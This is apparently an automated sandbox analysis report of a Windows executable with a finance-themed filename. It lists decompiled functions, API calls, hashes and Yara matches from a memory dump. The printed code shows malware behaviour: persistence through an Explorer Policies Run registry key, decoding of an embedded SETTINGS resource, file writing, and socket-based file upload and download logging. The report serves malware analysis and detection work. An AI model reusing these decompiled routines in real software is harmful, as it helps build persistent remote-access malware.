				_t89 = _t51 + _t20;
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
				E00402F9B( &_v1080, _v24, _t51);
				E0040309E( &_v1080,  &_v40, _v20, _v8); // executed
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}






















                                        0x0040982c
                                        0x0040983c
                                        0x00409842
                                        0x00409846
                                        0x0040984c
                                        0x00409853
                                        0x00409855
                                        0x00409855
                                        0x0040985a
                                        0x0040985d
                                        0x00409860
                                        0x00409867
                                        0x00409872
                                        0x0040987e
                                        0x00409887
                                        0x00409892
                                        0x0040989e
                                        0x004098a0
                                        0x004098a4
                                        0x004098aa
                                        0x004098aa
                                        0x004098b1
                                        0x004098be
                                        0x004098c6
                                        0x004098db
                                        0x004098e3
                                        0x004098f1
                                        0x004098fa
                                        0x00409907

                                        APIs
                                          • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                          • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                          • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                          • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        • malloc.MSVCRT ref: 00409846
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                        • malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                        • String ID:
                                        • API String ID: 531887698-0
                                        • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                        • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B7B9, Relevance: 10.5, APIs: 7, Instructions: 42registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
				long _t15;
				long _t18;
				void* _t21;
				int _t22;
				void* _t28;

				_t15 = RegCreateKeyW(_a4, _a8,  &_a8); // executed
				if(_t15 != 0) {
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
					_t17 = _t15 + _t15 + 2;
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t22 = 0;
					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17); // executed
					RegCloseKey(_a8);
					if(_t18 == 0) {
						_t22 = 1;
					}
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return _t22;
				}
			}








                                        0x0040b7c6
                                        0x0040b7ce
                                        0x0040b81f
                                        0x0040b828
                                        0x0040b7d0
                                        0x0040b7d5
                                        0x0040b7db
                                        0x0040b7e3
                                        0x0040b7ea
                                        0x0040b7f6
                                        0x0040b801
                                        0x0040b809
                                        0x0040b80b
                                        0x0040b80b
                                        0x0040b810
                                        0x0040b81b
                                        0x0040b81b

                                        APIs
                                        • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7D5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7E3
                                        • RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                        • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B801
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 0040B81F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 1037601705-0
                                        • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                        • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412D56, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				void* _t15;
				int _t17;
				struct _OVERLAPPED* _t19;
				long _t22;
				struct _OVERLAPPED* _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
				_t28 = _t15;
				if(_t28 != 0xffffffff) {
					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) {
						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
						if(_t17 != 0) {
							_t24 = 1;
						}
					}
					CloseHandle(_t28);
					_t19 = _t24;
				} else {
					_t19 = 0;
				}
				return _t19;
			}












                                        0x00412d5f
                                        0x00412d62
                                        0x00412d64
                                        0x00412d74
                                        0x00412d7b
                                        0x00412d66
                                        0x00412d67
                                        0x00412d6b
                                        0x00412d6c
                                        0x00412d6f
                                        0x00412d6f
                                        0x00412d67
                                        0x00412d93
                                        0x00412d99
                                        0x00412d9e
                                        0x00412da8
                                        0x00412dc6
                                        0x00412dce
                                        0x00412dd0
                                        0x00412dd0
                                        0x00412dce
                                        0x00412dd3
                                        0x00412dd9
                                        0x00412da0
                                        0x00412da0
                                        0x00412da0
                                        0x00412dde

                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                        • WriteFile.KERNELBASE(00000000,40000000,?,?,00000000), ref: 00412DC6
                                        • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandlePointerWrite
                                        • String ID:
                                        • API String ID: 3604237281-0
                                        • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                        • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B522, Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                        • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                        • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 2462357041-0
                                        • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                        • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040309E, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 2505548081-0
                                        • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                        • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B4C8, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
				int _v8;
				int _v12;
				int _t14;
				long _t16;
				long _t20;

				_t14 = 4;
				_v8 = _t14;
				_v12 = _t14;
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8);
					return RegCloseKey(_a8) & 0xffffff00 | _t20 == 0x00000000;
				}
			}








                                        0x0040b4cf
                                        0x0040b4d0
                                        0x0040b4d3
                                        0x0040b4e7
                                        0x0040b4ef
                                        0x0040b521
                                        0x0040b4f1
                                        0x0040b505
                                        0x0040b51d
                                        0x0040b51d

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                        • RegQueryValueExA.ADVAPI32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                        • RegCloseKey.ADVAPI32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                        • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413E46, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: __dllonexit_onexit
                                        • String ID:
                                        • API String ID: 2384194067-0
                                        • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                        • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00403C4A, Relevance: 240.6, APIs: 121, Strings: 16, Instructions: 868fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                        • SetEvent.KERNEL32(?), ref: 00403C69
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00403C8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                          • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                          • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                          • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                          • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                          • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                        • atoi.MSVCRT ref: 004041A0
                                          • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                          • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                          • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                          • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                          • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                          • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                          • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                          • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                          • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                          • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                          • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                          • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
